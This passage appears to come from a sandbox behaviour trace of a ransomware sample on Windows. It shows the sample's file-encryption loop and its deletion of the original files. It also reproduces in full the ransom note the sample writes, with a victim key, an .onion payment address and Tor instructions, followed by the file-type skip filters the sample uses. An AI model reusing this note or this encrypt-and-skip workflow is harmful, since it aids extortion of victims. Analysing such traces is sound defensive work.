dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.052] GetLastError () returned 0x0 [0161.052] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.052] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.052] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.052] GetLastError () returned 0x0 [0161.052] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.052] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.052] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.052] GetLastError () returned 0x0 [0161.052] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.052] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.052] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.052] GetLastError () returned 0x0 [0161.052] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.052] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.052] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.052] GetLastError () returned 0x0 [0161.052] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.053] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.053] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.053] GetLastError () returned 0x0 [0161.053] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.053] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.053] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.053] GetLastError () returned 0x0 [0161.053] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.053] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.053] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.053] GetLastError () returned 0x0 [0161.053] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.053] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.053] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.053] GetLastError () returned 0x0 [0161.053] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.053] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.053] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.053] GetLastError () returned 0x0 [0161.053] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.053] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.053] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.053] GetLastError () returned 0x0 [0161.053] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.054] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.054] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.054] GetLastError () returned 0x0 [0161.054] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.054] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.054] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.054] GetLastError () returned 0x0 [0161.054] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.054] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.054] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.054] GetLastError () returned 0x0 [0161.054] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.054] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.054] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.054] GetLastError () returned 0x0 [0161.054] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.054] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.054] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.054] GetLastError () returned 0x0 [0161.054] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.054] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.054] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.054] GetLastError () returned 0x0 [0161.054] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.054] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.054] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.054] GetLastError () returned 0x0 [0161.055] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.055] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.055] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.055] GetLastError () returned 0x0 [0161.055] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.055] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.055] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.055] GetLastError () returned 0x0 [0161.055] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.055] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.055] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.055] GetLastError () returned 0x0 [0161.055] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.055] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.055] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.055] GetLastError () returned 0x0 [0161.055] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.055] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.055] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.055] GetLastError () returned 0x0 [0161.055] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.055] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.055] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0161.055] GetLastError () returned 0x0 [0161.055] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0161.056] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0161.056] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0161.056] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui")) returned 0x20 [0161.056] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0161.056] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui") returned 1 [0161.056] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui")) returned 0 [0161.056] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui" [0161.056] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE") returned 1 [0161.056] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\.xXE877.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\.xxe877.tmp")) returned 0xe877 [0161.057] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\.xXE877.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\.xxe877.tmp"), dwFlags=0x1) returned 0 [0161.057] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\.xXE877.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\.xxe877.tmp")) returned 1 [0161.057] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0161.057] wcslen (_String="OK") returned 0x2 [0161.057] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.057] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.057] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0161.057] CryptDestroyHash (hHash=0x9ad378) returned 1 [0161.058] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0161.058] FindNextFileW (in: hFindFile=0x9ad5f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0161.058] GetLastError () returned 0x12 [0161.058] FindClose (in: hFindFile=0x9ad5f8 | out: hFindFile=0x9ad5f8) returned 1 [0161.058] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0161.058] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0161.058] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0161.059] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0161.059] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.059] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.059] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0161.059] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.059] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*.exe") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*.dll") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*.lnk") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*.bat") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*.ini") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*.msi") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*.scf") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*pagefile.sys*") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*NTUSER.DAT*") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*AppData*") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common 